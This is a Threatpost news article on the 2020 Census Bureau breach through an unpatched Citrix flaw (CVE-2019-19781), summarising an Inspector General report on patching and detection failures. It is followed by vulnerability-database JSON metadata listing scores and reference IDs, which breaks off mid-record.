Threat actors exploited an [unpatched Citrix flaw](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) to breach the network of the U.S. Census Bureau in January in an attack that was ultimately halted before a backdoor could be installed or sensitive data could be stolen, according [to a report](<https://www.oig.doc.gov/OIGPublications/OIG-21-034-A.pdf>) by a government watchdog organization.
However, investigators found that officials were informed of the flaw in its servers and had at least two opportunities to fix it before the attack, mainly due to lack of coordination between teams responsible for different security tasks, according to the report, published Tuesday by the U.S. Department of Commerce Office of Inspector General. The bureau also lagged in its discovery and reporting of the attack after it happened.
The report details and reviews the incident that occurred on Jan. 11, 2020, when attackers used the publicly available exploit for a critical flaw to target remote-access servers operated by the bureau.
[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)
Citrix released a public notice about the zero-day flaw—tracked as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)–in December. In January, a representative from the bureau’s Computer Incident Response Team (CIRT_ attended two meetings in which the flaw was discussed and attendees even received a link to steps to use fixes which already had been issued by Citrix.
“Despite the publicly available notices released in December and attending two meetings on the issue in January, the bureau CIRT did not coordinate with the team responsible for implementing these mitigation steps until after the servers had been attacked,” according to the report. Doing so could have prevented the attack, investigators noted.
## **‘Partially Successful’ Attack**
The Citrix products affected by the flaw–[discovered](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) by Mikhail Klyuchnikov, a researcher at Positive Technologies—are used for application-aware traffic management and secure remote access, respectively. At least 80,000 organizations in 158 countries—about 38 percent in the U.S.—use these products, formerly called NetScaler ADC and Gateway.
The initial compromise at the Census Bureau was on servers used to provide the bureau’s enterprise staff with remote-access capabilities to production, development and lab networks. The servers did not provide access to 2020 decennial census networks, officials told investigators.
“The exploit was partially successful, in that the attacker modified user account data on the systems to prepare for remote code execution,” according to the report. “However, the attacker’s attempts to maintain access to the system by creating a backdoor into the affected servers were unsuccessful.”
Attackers were able to make unauthorized changes to the remote-access servers, including the creation of new user accounts, investigators reported. However, the bureau’s firewalls blocked the attacker’s attempts to establish a backdoor to communicate with the attacker’s external command and control infrastructure.
## **Other Mistakes**
Another security misstep the bureau took that could have mitigated the attack before it even happened was that it was not conducting vulnerability scanning of the remote-access servers as per federal standards and Commerce Department policy, according to the OIG.
“We found that the bureau vulnerability scanning team maintained a list of devices to be scanned,” investigators wrote. “However, the remote-access servers were not included on the list, and were therefore not scanned. This occurred because the system and vulnerability scanning teams had not coordinated the transfer of system credentials required for credentialed scanning.”
The bureau also made mistakes after the attack by not discovering nor reporting the incident in a timely manner, the OIG found.
IT administrators were not aware that servers were compromised until Jan. 28, more than two weeks after the attack, because the bureau was not using a a security information and event management tool (SIEM) to proactively alert incident responders of suspicious network traffic, investigators found.
{"id": "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Postmortem on U.S. Census Hack Exposes Cybersecurity Failures", "description": "Threat actors exploited an [unpatched Citrix flaw](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) to breach the network of the U.S. Census Bureau in January in an attack that was ultimately halted before a backdoor could be installed or sensitive data could be stolen, according [to a report](<https://www.oig.doc.gov/OIGPublications/OIG-21-034-A.pdf>) by a government watchdog organization.\n\nHowever, investigators found that officials were informed of the flaw in its servers and had at least two opportunities to fix it before the attack, mainly due to lack of coordination between teams responsible for different security tasks, according to the report, published Tuesday by the U.S. Department of Commerce Office of Inspector General. The bureau also lagged in its discovery and reporting of the attack after it happened.\n\nThe report details and reviews the incident that occurred on Jan. 11, 2020, when attackers used the publicly available exploit for a critical flaw to target remote-access servers operated by the bureau. \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>) \nCitrix released a public notice about the zero-day flaw\u2014tracked as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\u2013in December. In January, a representative from the bureau\u2019s Computer Incident Response Team (CIRT_ attended two meetings in which the flaw was discussed and attendees even received a link to steps to use fixes which already had been issued by Citrix.\n\n\u201cDespite the publicly available notices released in December and attending two meetings on the issue in January, the bureau CIRT did not coordinate with the team responsible for implementing these mitigation steps until after the servers had been attacked,\u201d according to the report. Doing so could have prevented the attack, investigators noted.\n\n## **\u2018Partially Successful\u2019 Attack**\n\nThe Citrix products affected by the flaw\u2013[discovered](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) by Mikhail Klyuchnikov, a researcher at Positive Technologies\u2014are used for application-aware traffic management and secure remote access, respectively. At least 80,000 organizations in 158 countries\u2014about 38 percent in the U.S.\u2014use these products, formerly called NetScaler ADC and Gateway.\n\nThe initial compromise at the Census Bureau was on servers used to provide the bureau\u2019s enterprise staff with remote-access capabilities to production, development and lab networks. The servers did not provide access to 2020 decennial census networks, officials told investigators.\n\n\u201cThe exploit was partially successful, in that the attacker modified user account data on the systems to prepare for remote code execution,\u201d according to the report. \u201cHowever, the attacker\u2019s attempts to maintain access to the system by creating a backdoor into the affected servers were unsuccessful.\u201d\n\nAttackers were able to make unauthorized changes to the remote-access servers, including the creation of new user accounts, investigators reported. However, the bureau\u2019s firewalls blocked the attacker\u2019s attempts to establish a backdoor to communicate with the attacker\u2019s external command and control infrastructure.\n\n## **Other Mistakes**\n\nAnother security misstep the bureau took that could have mitigated the attack before it even happened was that it was not conducting vulnerability scanning of the remote-access servers as per federal standards and Commerce Department policy, according to the OIG.\n\n\u201cWe found that the bureau vulnerability scanning team maintained a list of devices to be scanned,\u201d investigators wrote. \u201cHowever, the remote-access servers were not included on the list, and were therefore not scanned. This occurred because the system and vulnerability scanning teams had not coordinated the transfer of system credentials required for credentialed scanning.\u201d\n\nThe bureau also made mistakes after the attack by not discovering nor reporting the incident in a timely manner, the OIG found.\n\nIT administrators were not aware that servers were compromised until Jan. 28, more than two weeks after the attack, because the bureau was not using a a security information and event management tool (SIEM) to proactively alert incident responders of suspicious network traffic, investigators found.\n", "published": "2021-08-19T14:35:49", "modified": "2021-08-19T14:35:49", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://threatpost.com/postmortem-on-u-s-census-hack-exposes-cybersecurity-failures/168814/", "reporter": "Elizabeth Montalbano", "references": ["https://threatpost.com/unpatched-citrix-flaw-exploits/151748/", "https://www.oig.doc.gov/OIGPublications/OIG-21-034-A.pdf", "https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/", "https://nvd.nist.gov/vuln/detail/CVE-2019-19781", "https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/"], "cvelist": ["CVE-2019-19781"], "immutableFields": [], "lastseen": "2021-08-19T14:50:21", "viewCount": 58, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65"]}, {"type": "avleonov", "idList": ["AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE"]}, {"type": "cert", "idList": ["VU:619785"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1653"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2019-19781"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cve", "idList": ["CVE-2019-19781"]}, {"type": "exploitdb", "idList": ["EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "githubexploit", "idList": ["0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "46FA259E-5429-580C-B1D5-D1F09EB90023", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "6787DC40-24C2-5626-B213-399038EFB0E9", "721C46F4-C390-5D23-B358-3D4B22959428", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "988A0BAB-669A-57AE-B432-564B2E378252", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD"]}, {"type": "ics", "idList": ["AA20-020A", "AA20-031A", "AA20-099A", "AA20-126A", "AA20-133A", "AA20-258A", "AA20-259A", "AA20-275A", "AA20-283A", "AA20-296A", "AA21-116A", "AA21-200B", "AA21-209A", "AA22-011A", "AA22-117A", "AA22-158A", "AA22-279A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kitploit", "idList": ["KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "nessus", "idList": ["701262.PRM", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019"]}, {"type": "securelist", "idList": ["SECURELIST:35644FF079836082B5B728F8E95F0EDD"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A"]}, {"type": "thn", "idList": ["THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:EB3F9784BB2A52721953F128D1B3EAEC"]}, {"type": "threatpost", "idList": ["THREATPOST:163B67EFAB31CDAD34D25B9194438851", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8"]}, {"type": "zdt", "idList": ["1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824"]}]}, "score": {"value": 1.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65"]}, {"type": "avleonov", "idList": ["AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE"]}, {"type": "cert", "idList": ["VU:619785"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1653"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cve", "idList": ["CVE-2019-19781"]}, {"type": "exploitdb", "idList": ["EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:BFB36D22F20651C632D25AA20588E904"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "githubexploit", "idList": ["0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "46FA259E-5429-580C-B1D5-D1F09EB90023", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "6787DC40-24C2-5626-B213-399038EFB0E9", "721C46F4-C390-5D23-B358-3D4B22959428", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "988A0BAB-669A-57AE-B432-564B2E378252", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250"]}, {"type": "kitploit", "idList": ["KITPLOIT:4421457840699592233"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL", "MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE"]}, {"type": "mssecure", "idList": ["MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "nessus", "idList": ["CITRIX_NETSCALER_CTX267027.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019"]}, {"type": "securelist", "idList": ["SECURELIST:35644FF079836082B5B728F8E95F0EDD"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A"]}, {"type": "thn", "idList": ["THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE"]}, {"type": "threatpost", "idList": ["THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8"]}, {"type": "zdt", "idList": ["1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-19781", "epss": "0.975420000", "percentile": "0.999870000", "modified": "2023-03-17"}], "vulnersScore": 1.8}, "_state": {"dependencies": 1678920471, "score": 1678921101, "epss": 1679109163}, "_internal": {"score_hash": "efd30307cc459896a33bf39ae8ba40c0"}}
{"githubexploit": [{"lastseen": "2022-02-18T03:41:51", "description": "# CVE-2019-19781-Forensic\n\n## Note : My advice is now to use the...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T20:43:37", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-02-18T00:29:46", "id": "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:30", "description": "# ADC-19781\nSeveral checks for CVE-2019-19781\n\n\n## Module instal...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T12:33:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-08-15T04:34:45", "id": "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:27", "description": "# CVE-2019-19781 \n\nTo use this scanner goto https://cve-2019-197...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T21:54:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-28T22:56:43", "id": "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:48", "description": "# CVE-2019-19781\nJust a python3 CVE-2019-19781 exploit for Citri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-28T12:09:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 